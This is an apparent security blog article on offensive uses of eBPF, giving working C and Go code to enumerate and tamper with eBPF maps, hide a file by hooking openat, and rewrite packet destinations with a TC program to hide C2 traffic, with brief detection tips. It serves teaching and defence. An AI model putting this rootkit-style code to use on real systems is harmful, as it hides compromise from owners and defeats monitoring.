It’s not a mystery that eBPF (Extended Berkeley Packet Filter) is a powerful technology, and given its nature, it can be used for good and bad purposes. In this article, we will explore some of the offensive capabilities that eBPF can provide to an attacker and how to defend against them.
eBPF has gained a lot of attention since it was first merged into the Linux kernel in 2014 (kernel 3.18). This powerful technology allows one to run programs deep inside the Linux kernel without writing kernel modules or loading kernel drivers. These programs are written in a restricted C-like language and compiled into bytecode that is executed by the kernel in the eBPF virtual machine. Given their nature, eBPF programs don’t have the usual lifecycle of a user-space process, but are rather executed when certain (programmer-specified) kernel events occur.
These events are called hooks and are found throughout the kernel, such as network sockets, tracepoints, kprobes, uprobes, and more. They can be used for many different purposes, such as tracing, networking, and security.
In fact, many of today’s security monitoring tools, Falco being one of them, use eBPF to monitor the system for malicious activity, analyze performance, and enforce security policies.
Probes everywhere – eBPF hooks
eBPF programs can be attached to many different hooks inside the kernel, and the list is growing with every new kernel release. These hooks are called probes and they are placed in various places in the kernel. Here, we’ll expand upon a few of them.
- Kprobes – Kernel probes are used to instrument kernel functions. They are placed at the beginning or at the end of a function (Kretprobe) and they can be used to trace the execution of a function, to modify the arguments passed to the function, or to skip the execution of the function entirely.
- Uprobes – User probes are used to instrument user-space functions. They can be placed inside a function or any given address (Uretprobe exists too). They are different from Kprobes in the sense that they are used to instrument user-space.
- Tracepoints – Tracepoints are static markers placed at various points throughout the kernel. They are used to trace the execution of the kernel. The main difference with kprobes is that they are codified by the kernel developers when they implement changes in the kernel.
- TC or Traffic Control – Used to monitor and control network traffic. TC programs are similar to eXpress Data Path (XDP) programs, but they run later in the network stack, after the kernel has allocated a socket buffer for the packet. They can be used to modify the packet or to drop it entirely.
- XDP or eXpress Data Path – Like traffic control hooks, they are used to monitor network packets, but they are much faster than TC hooks because they run before the kernel network stack processes the packet. They can also be used to modify the packet or to drop it entirely.
With this many hooks available, eBPF programs can be used to monitor and modify the execution of the kernel. This is why eBPF is so powerful, and also why it can be used for bad purposes too.
eBPF programs
eBPF programs are compiled into bytecode that is executed by the kernel. The eBPF programs are loaded into the kernel using the bpf() syscall – the syscall signature looks like this:
int bpf(int cmd, union bpf_attr *attr, unsigned int size);
The cmd parameter specifies the operation to perform, the attr parameter carries the arguments for that operation, and the size parameter is the size of the attr union in bytes.
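glibc does not ship a wrapper for bpf(), so programs usually reach it through syscall(2). The snippets later in this article call sys_bpf(), ptr_to_u64() and offsetofend(), which are libbpf-internal helpers. A minimal sketch of equivalent helpers, assuming a Linux system with the kernel UAPI headers installed, could look like this:

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <linux/bpf.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Offset of the first byte after MEMBER inside TYPE. */
#ifndef offsetofend
#define offsetofend(TYPE, MEMBER) \
    (offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER))
#endif

/* The bpf() ABI carries user-space pointers as 64-bit integers. */
static inline uint64_t ptr_to_u64(const void *ptr)
{
    return (uint64_t)(uintptr_t)ptr;
}

/* Thin wrapper: returns -1 and sets errno on failure, like any raw syscall. */
static inline int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr,
                          unsigned int size)
{
    return (int)syscall(__NR_bpf, cmd, attr, size);
}
```

Passing only the bytes up to the last field a command uses (offsetofend) rather than sizeof(union bpf_attr) keeps a binary built against newer headers compatible with older kernels.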
There are many different possible commands, some of them are:
enum bpf_cmd {
BPF_MAP_CREATE, /* create map */
BPF_MAP_LOOKUP_ELEM, /* lookup element in map */
BPF_MAP_UPDATE_ELEM, /* update element in map */
BPF_MAP_DELETE_ELEM, /* delete element in map */
BPF_MAP_GET_NEXT_KEY, /* get next key in map */
BPF_PROG_LOAD, /* load BPF program */
...
...
};
Right now, we are interested in the BPF_PROG_LOAD command. This command is used to load an eBPF program into the kernel, and the attr parameter specifies the type of the program to load, the bytecode, the number of instructions, and other parameters. The bpf() syscall returns a file descriptor that refers to the loaded program. This file descriptor can be used to attach the program to a hook. The program remains in kernel memory until the last reference to it (the file descriptor, an attachment, or a pin in the BPF filesystem) is gone.
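As an illustration of BPF_PROG_LOAD, the sketch below loads the smallest possible program ("r0 = 0; exit") as a socket filter. The names trivial_prog, fill_prog_load_attr and load_trivial_prog are hypothetical, and whether the load succeeds depends on the privileges of the caller and on the kernel configuration:

```c
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Two raw eBPF instructions: "r0 = 0" followed by "exit". */
static const struct bpf_insn trivial_prog[] = {
    { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 },
    { .code = BPF_JMP | BPF_EXIT },
};

/* Fill the BPF_PROG_LOAD arguments for the program above. */
static void fill_prog_load_attr(union bpf_attr *attr)
{
    memset(attr, 0, sizeof(*attr));
    attr->prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr->insns = (uint64_t)(uintptr_t)trivial_prog;
    attr->insn_cnt = sizeof(trivial_prog) / sizeof(trivial_prog[0]);
    attr->license = (uint64_t)(uintptr_t)"GPL";
}

/* Returns a program file descriptor, or -1 with errno set. */
static int load_trivial_prog(void)
{
    union bpf_attr attr;

    fill_prog_load_attr(&attr);
    return (int)syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
```

Note that insn_cnt counts instructions (8 bytes each), not bytes.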
Fortunately for us, we don’t have to directly call the bpf() syscall in order to create eBPF programs, because several libraries wrap it. We will use libbpfgo in this article, but the concepts are the same for all the libraries.
Kernel-mode to user-mode communication and vice-versa
eBPF programs are executed in the kernel, but they can communicate with user-space programs and vice-versa. This is done using special objects called maps. Maps are key-value stores that can be used to exchange data between the kernel and user-space. They are created using the BPF_MAP_CREATE command, and they can be of different types. Some of them are:
- BPF_MAP_TYPE_ARRAY – an array of elements, each element can be accessed using an index.
- BPF_MAP_TYPE_HASH – a hash table, each element can be accessed using a key.
- BPF_MAP_TYPE_PERCPU_ARRAY – an array of elements, each element can be accessed using an index, but uses a different memory region per CPU.
- BPF_MAP_TYPE_PERCPU_HASH – a hash table, each element can be accessed using a key, but uses a different memory region per CPU.
- BPF_MAP_TYPE_STACK – a stack of elements; it has no keys, and elements are pushed, popped, and peeked in a LIFO fashion.
- BPF_MAP_TYPE_QUEUE – a queue of elements; it has no keys, and elements are pushed, popped, and peeked in a FIFO fashion.
- BPF_MAP_TYPE_PERF_EVENT_ARRAY – a special map used to send events to user-space.
For our purpose, we will use a BPF_MAP_TYPE_HASH to share some structs between the user-space and the kernel and a BPF_MAP_TYPE_PERF_EVENT_ARRAY to send events to user-space.
eBPF programs format
As we said before, eBPF programs are written in a restricted C-like language which is then translated into bytecode. The eBPF virtual machine is a 64-bit RISC machine, and it has 11 registers and a fixed size (512 bytes) stack. The registers are:
- r0 – stores return values, both for function calls and the current program exit code.
- r1–r5 – used as function call arguments, upon program start r1 contains the “context” argument pointer.
- r6–r9 – callee-saved registers, preserved across calls to kernel helper functions.
- r10 – read-only frame pointer, used to access the stack.
The eBPF virtual machine also supports 32-bit operations on the lower half of each register; these instructions zero the upper 32 bits of the destination register.
This source-to-bytecode translation is handled by clang, which can target the eBPF virtual architecture directly. In order to compile a C program into eBPF bytecode, we can use the following command:
clang -O2 -g -target bpf -c program.c -o program.o
This will compile the program.c file into program.o, an ELF object that contains the bytecode. Optimization (-O2) is needed in practice because unoptimized code is usually rejected by the verifier, and -g emits the BTF type information that loaders rely on. This file can then be relocated and loaded into the kernel using the libraries we mentioned before.
JIT compilation, Verifier, and ALU sanitization
Due to their performance-critical nature, eBPF programs are compiled from VM bytecode into native machine code by the kernel. This is called JIT or Just In Time compilation, and it is done only once, when the program is loaded. The JIT is controlled by the net.core.bpf_jit_enable sysctl and is always used when the kernel is built with CONFIG_BPF_JIT_ALWAYS_ON=y; otherwise the kernel can fall back to interpreting the bytecode. The compiled program is then stored in kernel memory and is executed every time the hook is triggered.
Executing untrusted code inside the kernel can be really dangerous, which is why the kernel developers implemented a verifier that checks the bytecode before it is compiled. The verifier checks that the program is safe to execute and that it is not too complex, which avoids denial of service (DoS) attacks. It also checks that the program does not access memory outside its stack or memory that it is not allowed to reach, which avoids memory corruption attacks. On top of these static checks, ALU sanitization patches pointer arithmetic at load time so that, at runtime, a pointer cannot move past the limits the verifier computed.
This safety is achieved by emulating the sequence of instructions and checking that the registers are used correctly. Below are some of the checks performed by the verifier, to name a few:
- Pointer bounds checking
- Verifying that the stack’s reads are preceded by stack writes
- Preventing the use of unbounded loops
- Register value tracking
- Branch pruning
- And many more…
More information about the verifier can be found in its source code, kernel/bpf/verifier.c, which is linked in the references.
eBPF offensive capabilities
Given the knowledge we have so far, we can start to think about some offensive capabilities that eBPF programs can provide. Below are some of them:
- Abusing direct map access – eBPF programs can access maps directly, meaning that if we have access to a map file descriptor, we can modify the logic of the program.
- Abusing Kprobes – eBPF programs use carefully crafted Kprobes to hook into kernel functions, so we can modify the behavior of the kernel like hiding processes or files.
- Abusing TC hook – eBPF programs can be attached to the TC hook, meaning that we can use eBPF programs to modify the traffic of a specific interface even hiding malicious traffic.
- Abusing Uprobes – eBPF programs can use Uprobes to hook into user-space functions, meaning that we can modify the behavior of user-space programs.
Following, we will see some examples of these capabilities.
Abusing direct map access
Due to their nature, maps are a great target for attackers since writing to a map could modify the logic of the underlying eBPF program. Assume we are analyzing a firewall implementation entirely done with eBPF. The user-space component could talk over maps to the kernel to update the list of firewall rules. In order to tamper with those rules, we would need access to that map’s file descriptor. That’s actually possible thanks to the BPF_MAP_GET_NEXT_ID, BPF_MAP_GET_FD_BY_ID, BPF_MAP_GET_NEXT_KEY and BPF_MAP_LOOKUP_ELEM commands. Root permission (CAP_SYS_ADMIN) is needed.
First of all, we need to enumerate all the available maps. This can be done using the BPF_MAP_GET_NEXT_ID command, which returns the id of the next map after the one passed in. The following code shows how to do this:
static int bpf_obj_get_next_id(__u32 start_id, __u32 *next_id)
{
    const size_t attr_sz = offsetofend(union bpf_attr, open_flags);
    union bpf_attr attr;
    int err;

    memset(&attr, 0, attr_sz);
    attr.start_id = start_id;
    err = sys_bpf(BPF_MAP_GET_NEXT_ID, &attr, attr_sz);
    if (!err)
        *next_id = attr.next_id;
    return err;
}
To loop through all the available maps, we can do something like this:
__u32 next_id = 0; // 0 means "start from the first map"
while (bpf_obj_get_next_id(next_id, &next_id) == 0) {
    // do something with the id
}
Once we have the map id, we can use the BPF_MAP_GET_FD_BY_ID command to get the file descriptor of the map. This can be done in the following way:
int bpf_map_get_fd_by_id_opts(uint32_t id, const struct bpf_get_fd_by_id_opts *opts)
{
    const size_t attr_sz = offsetofend(union bpf_attr, open_flags);
    union bpf_attr attr;
    int fd;

    if (!OPTS_VALID(opts, bpf_get_fd_by_id_opts))
        return libbpf_err(-EINVAL);
    memset(&attr, 0, attr_sz);
    attr.map_id = id;
    attr.open_flags = OPTS_GET(opts, open_flags, 0);
    fd = sys_bpf_fd(BPF_MAP_GET_FD_BY_ID, &attr, attr_sz);
    return libbpf_err_errno(fd);
}
Then we can retrieve the map file descriptor (bpf_map_get_fd_by_id() is the libbpf convenience wrapper that calls the function above with NULL options):
int fd = bpf_map_get_fd_by_id(next_id);
Once we have the file descriptor, we can get the map type and the map name using the BPF_OBJ_GET_INFO_BY_FD command:
int bpf_obj_get_info_by_fd(int bpf_fd, void *info, __u32 *info_len)
{
    const size_t attr_sz = offsetofend(union bpf_attr, info);
    union bpf_attr attr;
    int err;

    memset(&attr, 0, attr_sz);
    attr.info.bpf_fd = bpf_fd;
    attr.info.info_len = *info_len;
    attr.info.info = ptr_to_u64(info);
    err = sys_bpf(BPF_OBJ_GET_INFO_BY_FD, &attr, attr_sz);
    if (!err)
        *info_len = attr.info.info_len;
    return libbpf_err_errno(err);
}
Then we can retrieve the map type and the map name:
struct bpf_map_info info = {};
__u32 info_len = sizeof(info);
int ret = bpf_obj_get_info_by_fd(fd, &info, &info_len);
The struct bpf_map_info contains the map type and the map name. We can read them this way:
printf("map name: %s\n", info.name);
printf("map type: %d\n", info.type);
This is actually really useful if we want to filter the maps by name or by type:
if (strcmp(info.name, "firewall") == 0 && info.type == BPF_MAP_TYPE_HASH) {
    // this is the map we are looking for
}
Once we have all the needed information, we can start to interact with the map. For example, we can retrieve all the keys of the map using the BPF_MAP_GET_NEXT_KEY command:
int bpf_map_get_next_key(int fd, const void *key, void *next_key)
{
    const size_t attr_sz = offsetofend(union bpf_attr, next_key);
    union bpf_attr attr;
    int ret;

    memset(&attr, 0, attr_sz);
    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.next_key = ptr_to_u64(next_key);
    ret = sys_bpf(BPF_MAP_GET_NEXT_KEY, &attr, attr_sz);
    return libbpf_err_errno(ret);
}
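And then we can walk the keys, feeding each returned key back in as the starting point of the next call:
unsigned int key = -1; // assumed not to exist, so the first call returns the first key
unsigned int next_key;
while (bpf_map_get_next_key(fd, &key, &next_key) == 0) {
    // do something with next_key
    key = next_key;
}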
With the BPF_MAP_LOOKUP_ELEM command, we can look up the value of a given key:
int bpf_map_lookup_elem(int fd, const void *key, void *value)
{
    const size_t attr_sz = offsetofend(union bpf_attr, flags);
    union bpf_attr attr;
    int ret;

    memset(&attr, 0, attr_sz);
    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.value = ptr_to_u64(value);
    ret = sys_bpf(BPF_MAP_LOOKUP_ELEM, &attr, attr_sz);
    return libbpf_err_errno(ret);
}
The final code will look like this:
int main(int argc, char **argv)
{
    unsigned int next_id = 0;

    while (bpf_obj_get_next_id(next_id, &next_id) == 0)
    {
        int fd = bpf_map_get_fd_by_id(next_id);
        if (fd < 0)
        {
            printf("bpf_map_get_fd_by_id failed: %d (%d)\n", fd, errno);
            return 1;
        }
        struct bpf_map_info info = {};
        __u32 info_len = sizeof(info);
        int ret = bpf_obj_get_info_by_fd(fd, &info, &info_len);
        if (ret < 0)
        {
            printf("bpf_obj_get_info_by_fd failed: %d (%d)\n", ret, errno);
            close(fd);
            return 1;
        }
        printf("map fd: %d\n", fd);
        printf("map name: %s\n", info.name);
        printf("map type: %s\n", bpf_map_type_to_string(info.type));
        printf("map key size: %u\n", info.key_size);
        printf("map value size: %u\n", info.value_size);
        printf("map max entries: %u\n", info.max_entries);
        printf("map flags: %u\n", info.map_flags);
        printf("map id: %u\n", info.id);
        // per-CPU maps return one value per possible CPU and need a larger
        // buffer, so this simple dumper only lists their metadata
        int percpu = info.type == BPF_MAP_TYPE_PERCPU_HASH ||
                     info.type == BPF_MAP_TYPE_PERCPU_ARRAY ||
                     info.type == BPF_MAP_TYPE_LRU_PERCPU_HASH;
        // size the buffers from the map info: keys are not always 4 bytes
        void *key = malloc(info.key_size);
        void *value = malloc(info.value_size);
        void *prev = NULL; // NULL asks for the first key
        printf("keys:\n");
        while (!percpu && key && value && bpf_map_get_next_key(fd, prev, key) == 0)
        {
            ret = bpf_map_lookup_elem(fd, key, value);
            if (ret == 0)
            {
                printf(" - ");
                map_hexdump(key, info.key_size);
                map_hexdump(value, info.value_size);
                printf("\n");
            }
            prev = key;
        }
        free(key);
        free(value);
        close(fd);
        printf("------------------------\n");
    }
    return 0;
}
Once we have access to the file descriptor, it’s just a matter of reversing the map content and interpreting it. This would allow an attacker to modify the map content and change the behavior of the eBPF program (e.g., bypassing security checks).
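The code above only reads the maps. The write side is a single BPF_MAP_UPDATE_ELEM call, sketched below with the raw syscall so that it is self-contained. map_update_elem is a hypothetical name (libbpf exposes the same operation as bpf_map_update_elem), and the key and value layouts depend entirely on the targeted program:

```c
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/*
 * Write (or overwrite) one element of the map behind fd.
 * flags is BPF_ANY, BPF_NOEXIST or BPF_EXIST.
 * Returns 0 on success, -1 with errno set otherwise.
 */
static int map_update_elem(int fd, const void *key, const void *value,
                           uint64_t flags)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = (uint32_t)fd;
    attr.key = (uint64_t)(uintptr_t)key;
    attr.value = (uint64_t)(uintptr_t)value;
    attr.flags = flags;
    return (int)syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
```

In the firewall scenario, an attacker who has worked out the rule layout could use such a call with BPF_EXIST to overwrite an existing rule in place.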
A funny attack could be abusing the BPF_MAP_FREEZE command. As stated in the documentation:
/*
* BPF_MAP_FREEZE
* Description
* Freeze the permissions of the specified map.
*
* Write permissions may be frozen by passing zero *flags*.
* Upon success, no future syscall invocations may alter the
* map state of *map_fd*. Write operations from eBPF programs
* are still possible for a frozen map.
*
* Not supported for maps of type **BPF_MAP_TYPE_STRUCT_OPS**.
*
* Return
* Returns zero on success. On error, -1 is returned and *errno*
* is set appropriately.
*/
Doing so would prevent any future syscall from altering the map state from user-space. In the firewall scenario, for example, the legitimate user-space component could no longer update its own rules. From then on, the map content can be modified only by eBPF programs.
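Freezing a map takes a single call. The sketch below uses the raw syscall and assumes kernel headers recent enough to define BPF_MAP_FREEZE (Linux 5.2 or later); map_freeze is a hypothetical name for what libbpf exposes as bpf_map_freeze:

```c
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Freeze the map behind fd; returns 0 on success, -1 with errno set. */
static int map_freeze(int fd)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = (uint32_t)fd;
    return (int)syscall(__NR_bpf, BPF_MAP_FREEZE, &attr, sizeof(attr));
}
```

Once the call succeeds, later update or delete attempts made through the bpf() syscall are refused, while the eBPF program itself can keep writing to the map.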
Hiding files with Kprobes
Hooking syscalls from the kernel itself is quite handy when it comes to hiding files, folders, or even processes from the user. The following example shows how to hide a specific file from any command that tries to read it (e.g., cat, nano, grep, etc.).
It works by attaching a program to the sys_enter tracepoint, which gets triggered every time a syscall is invoked. The program checks whether the syscall id is SYS_openat and whether the path matches the one we want to hide. If so, it overwrites the first byte of the path with a null byte, so the open is attempted on an empty path and fails. This example uses maps to store the target path and, optionally, the target process name and pid. This allows us to hide the file only from a specific process or from all processes.
The first thing to do is create a new tracepoint program using the BPF_PROG_TYPE_RAW_TRACEPOINT program type. This can be done like this:
SEC("raw_tracepoint/sys_enter")
int raw_tracepoint__sys_enter(struct bpf_raw_tracepoint_args *ctx)
{
    // your code here
    return 0;
}
SEC is a macro that is used to specify the ELF section of the program. In this case, we are using the raw_tracepoint/sys_enter section, which libbpf uses to attach the program to the sys_enter tracepoint.
The bpf_raw_tracepoint_args struct contains the arguments passed to the tracepoint. In this case, the first argument is a pointer to the pt_regs struct, which holds the registers of the current process at syscall entry. The second argument is the syscall id, so we want to check if the syscall id is SYS_openat and, if so, overwrite the path with a null byte.
unsigned long syscall_id = ctx->args[1];
struct pt_regs *regs;

regs = (struct pt_regs *)ctx->args[0];
if (syscall_id == SYS_openat)
{
    // do something
}
In order to communicate with the running program in user-mode, we shared a struct like the following:
struct target
{
    int pid;
    char procname[16];
    char path[256];
};

struct
{
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, struct target);
    __uint(max_entries, 1);
} target SEC(".maps");
The same struct must be defined on the Go side, with the same field sizes and order:
type Target struct {
	Pid  uint32
	Comm [16]byte
	Path [256]byte
}
We then can update the struct from the user-space like this:
targetMap, err := bpfModule.GetMap("target")
if err != nil {
	fmt.Fprintln(os.Stderr, err)
	os.Exit(-1)
}
// update the map
key := uint32(0x1337)
var val Target
copy(val.Comm[:], procname)
copy(val.Path[:], filepath)
val.Pid = uint32(pid)
keyUnsafe := unsafe.Pointer(&key)
valueUnsafe := unsafe.Pointer(&val)
// Update returns an error that should not be silently dropped
if err := targetMap.Update(keyUnsafe, valueUnsafe); err != nil {
	fmt.Fprintln(os.Stderr, err)
	os.Exit(-1)
}
In order to make everything work, we would need some utility functions since eBPF programs can’t use libc functions. The following functions are used to manipulate strings:
static __always_inline __u64
__bpf_strncmp(const void *x, const void *y, __u64 len)
{
    // implement strncmp: compare at most len bytes, stop at the first NUL
    for (__u64 i = 0; i < len; i++)
    {
        if (((char *)x)[i] != ((char *)y)[i])
        {
            return ((char *)x)[i] - ((char *)y)[i];
        }
        else if (((char *)x)[i] == '\0')
        {
            return 0;
        }
    }
    return 0;
}

static __always_inline __u64
__bpf_strlen(const void *x)
{
    // implement strlen; the verifier rejects unbounded loops, so cap the
    // scan at 256 bytes (the size of the path buffers used in this example)
    __u64 len = 0;
    while (len < 256 && ((char *)x)[len] != '\0')
    {
        len++;
    }
    return len;
}
The final code will look like this:
if (syscall_id == SYS_openat)
{
    struct target *tar;
    u32 key = 0x1337;

    tar = bpf_map_lookup_elem(&target, &key);
    if (!tar)
    {
        return 0;
    }
    // openat(dirfd, pathname, ...): the path is the second syscall argument
    char pathname[256];
    char *pathname_ptr = (char *)PT_REGS_PARM2_CORE(regs);
    bpf_core_read_user_str(&pathname, sizeof(pathname), pathname_ptr);
    char comm[16];
    bpf_get_current_comm(&comm, sizeof(comm));
    u32 pid = bpf_get_current_pid_tgid() >> 32;

    // the path must always match; pid and process name are optional filters
    bool path_match = __bpf_strncmp(pathname, tar->path, sizeof(pathname)) == 0;
    bool pid_match = tar->pid != 0 && pid == (u32)tar->pid;
    bool comm_match = tar->procname[0] != '\0' &&
                      __bpf_strncmp(comm, tar->procname, sizeof(comm)) == 0;
    bool no_filter = tar->pid == 0 && tar->procname[0] == '\0';

    if (path_match && (no_filter || pid_match || comm_match))
    {
        // truncate the user-space path to an empty string
        if (bpf_probe_write_user(pathname_ptr, "\x00", 1) != 0)
        {
            return 0;
        }
    }
}
Another approach to obtain the same result is hooking SYS_getdents64 (or the legacy SYS_getdents) and filtering the file we want to hide out of the list of directory entries returned by the syscall.
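The buffer manipulation behind that second approach can be illustrated in plain user-space C. The sketch below is not an eBPF program: dirent64_rec mirrors the kernel's linux_dirent64 layout, hide_dirent is a hypothetical name, and an eBPF implementation would have to apply the same edit to the user buffer with bpf_probe_read_user and bpf_probe_write_user when the syscall returns.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same layout as the kernel's struct linux_dirent64. */
struct dirent64_rec {
    uint64_t d_ino;
    int64_t d_off;
    unsigned short d_reclen; /* size of this record in bytes */
    unsigned char d_type;
    char d_name[];
};

/*
 * Hide every record called `name` from a getdents64() result buffer of
 * `len` bytes. Returns the new length of the buffer.
 */
static size_t hide_dirent(char *buf, size_t len, const char *name)
{
    size_t pos = 0;
    struct dirent64_rec *prev = NULL;

    while (pos < len) {
        struct dirent64_rec *cur = (struct dirent64_rec *)(buf + pos);
        size_t reclen = cur->d_reclen;

        if (reclen == 0 || pos + reclen > len)
            break; /* malformed buffer, stop */

        if (strcmp(cur->d_name, name) == 0) {
            if (prev) {
                /* Grow the previous record so readers skip this one. */
                prev->d_reclen += reclen;
                pos += reclen;
            } else {
                /* First record: shift the rest of the buffer down. */
                memmove(buf, buf + reclen, len - reclen);
                len -= reclen;
            }
            continue;
        }
        prev = cur;
        pos += reclen;
    }
    return len;
}
```

Growing the previous record's d_reclen is the cheaper of the two cases, because only two bytes of the buffer have to be rewritten.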
From a defensive perspective, it’s possible to detect this kind of attack by using eBPF to monitor calls to SYS_bpf and check if the attacker is trying to load a program that hooks syscalls. This can be done by checking whether the program type reported in the bpf_prog_info struct is BPF_PROG_TYPE_RAW_TRACEPOINT.
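A complementary check can be run from user-space by listing the programs that are already loaded and flagging the types able to hook syscalls. The sketch below assumes root privileges for the enumeration; prog_type_can_hook_syscalls and count_hooking_progs are hypothetical names, and the list of types is a starting point rather than an exhaustive one:

```c
#include <linux/bpf.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Program types that can observe or tamper with syscalls. */
static bool prog_type_can_hook_syscalls(enum bpf_prog_type type)
{
    switch (type) {
    case BPF_PROG_TYPE_KPROBE:
    case BPF_PROG_TYPE_TRACEPOINT:
    case BPF_PROG_TYPE_RAW_TRACEPOINT:
    case BPF_PROG_TYPE_TRACING:
        return true;
    default:
        return false;
    }
}

/* Walk all loaded programs and report the ones of a hooking type. */
static int count_hooking_progs(void)
{
    union bpf_attr attr;
    uint32_t id = 0;
    int count = 0;

    for (;;) {
        memset(&attr, 0, sizeof(attr));
        attr.start_id = id;
        if (syscall(__NR_bpf, BPF_PROG_GET_NEXT_ID, &attr, sizeof(attr)) < 0)
            break; /* ENOENT at the end of the list, EPERM if unprivileged */
        id = attr.next_id;

        memset(&attr, 0, sizeof(attr));
        attr.prog_id = id;
        int fd = (int)syscall(__NR_bpf, BPF_PROG_GET_FD_BY_ID, &attr, sizeof(attr));
        if (fd < 0)
            continue; /* program was unloaded in the meantime */

        struct bpf_prog_info info;
        memset(&info, 0, sizeof(info));
        memset(&attr, 0, sizeof(attr));
        attr.info.bpf_fd = (uint32_t)fd;
        attr.info.info_len = sizeof(info);
        attr.info.info = (uint64_t)(uintptr_t)&info;
        if (syscall(__NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr)) == 0 &&
            prog_type_can_hook_syscalls((enum bpf_prog_type)info.type)) {
            printf("hooking program id=%u name=%s\n", info.id, info.name);
            count++;
        }
        close(fd);
    }
    return count;
}
```

Legitimate tools load programs of these types too, so in practice the output would be compared against an allowlist of expected program names.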
Traffic redirection with TC
Another important feature of eBPF is the ability to modify incoming and outgoing traffic on the fly, which can be done using the TC hook. On the ingress path this hook runs after the XDP hook, so a packet that reaches TC has already passed any XDP program attached to the interface.
TC can be abused to hide malicious traffic and is really useful when it comes to hiding C2 traffic. The following example shows how to redirect the traffic addressed to one IP address and port to a different destination. This way, anyone who inspects the connection on the host itself, rather than on the wire, won’t see the real destination of the packets.
The first thing to do is create a new TC hook like this:
SEC("tc")
int tc_prog(struct __sk_buff *skb)
{
    return TC_ACT_OK;
}
The most common return values are TC_ACT_OK and TC_ACT_SHOT. The first one means that the packet should be processed normally, the second one means that the packet should be dropped, so pay attention to this, otherwise you will end up dropping all the traffic.
The __sk_buff struct contains all the information about the packet. We can use it to retrieve the destination IP address and modify it. The following code shows how to do this:
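// skb->data and skb->data_end are 32-bit fields that must be cast to pointers
void *data = (void *)(long)skb->data;
void *data_end = (void *)(long)skb->data_end;

struct iphdr *iph = data + sizeof(struct ethhdr);
if ((void *)(iph + 1) > data_end)
{
    return TC_ACT_OK;
}
// the fixed offsets below assume an IPv4 header without options
if (iph->protocol == IPPROTO_TCP && iph->ihl == 5)
{
    // get tcphdr
    struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
    if ((void *)(tcph + 1) > data_end)
    {
        return TC_ACT_OK;
    }
    // keep the original values (network byte order) for the checksum updates
    __be32 old_addr = iph->daddr;
    __be16 old_port = tcph->dest;
    // match on destination 222.173.190.239 (0xDEADBEEF), port 0x1337
    if (bpf_ntohl(old_addr) == 0xDEADBEEF && bpf_ntohs(old_port) == 0x1337)
    {
        const __u32 ip_csum_off = sizeof(struct ethhdr) + offsetof(struct iphdr, check);
        const __u32 ip_dst_off = sizeof(struct ethhdr) + offsetof(struct iphdr, daddr);
        const __u32 tcp_csum_off = sizeof(struct ethhdr) + sizeof(struct iphdr) + offsetof(struct tcphdr, check);
        const __u32 tcp_dst_off = sizeof(struct ethhdr) + sizeof(struct iphdr) + offsetof(struct tcphdr, dest);

        // modify dest port to 1234, patching the TCP checksum first
        __be16 new_port = bpf_htons(1234);
        bpf_l4_csum_replace(skb, tcp_csum_off, old_port, new_port, sizeof(new_port));
        bpf_skb_store_bytes(skb, tcp_dst_off, &new_port, sizeof(new_port), 0);
        // modify dest addr to 15.196.197.177 (0x0FC4C5B1); the address is part
        // of the TCP pseudo-header, so both the TCP and the IP checksum change
        __be32 new_addr = bpf_htonl(0x0FC4C5B1);
        bpf_l4_csum_replace(skb, tcp_csum_off, old_addr, new_addr, BPF_F_PSEUDO_HDR | sizeof(new_addr));
        bpf_l3_csum_replace(skb, ip_csum_off, old_addr, new_addr, sizeof(new_addr));
        bpf_skb_store_bytes(skb, ip_dst_off, &new_addr, sizeof(new_addr), 0);
        // the helpers above invalidate iph and tcph: re-derive them from
        // skb->data before reading the packet again
    }
}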
Just remember to update the checksums after modifying the packet, otherwise the packet will be dropped by the kernel.
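To make the checksum requirement concrete, the user-space sketch below computes an IPv4 header checksum from scratch and then patches it incrementally when a 16-bit word changes, following RFC 1624. The function names are hypothetical and the code only illustrates the arithmetic; inside a TC program the kernel's checksum helpers would do this work.

```c
#include <stddef.h>
#include <stdint.h>

/* RFC 1071: one's-complement sum of big-endian 16-bit words, inverted. */
static uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;

    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)(data[i] << 8 | data[i + 1]);
    if (len & 1)
        sum += (uint32_t)data[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* RFC 1624, eq. 3: HC' = ~(~HC + ~m + m') for one changed 16-bit word. */
static uint16_t csum_replace16(uint16_t check, uint16_t old_word,
                               uint16_t new_word)
{
    uint32_t sum = (uint16_t)~check;

    sum += (uint16_t)~old_word;
    sum += new_word;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}
```

Changing a 32-bit destination address means calling csum_replace16 twice, once per 16-bit half, and the TCP checksum needs the same treatment because the address is part of the TCP pseudo-header.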
To detect such attacks, it is sufficient to use external monitoring tools or hardware: once the packet has left the host, its actual destination is visible on the wire.
Sudoers hidden root account
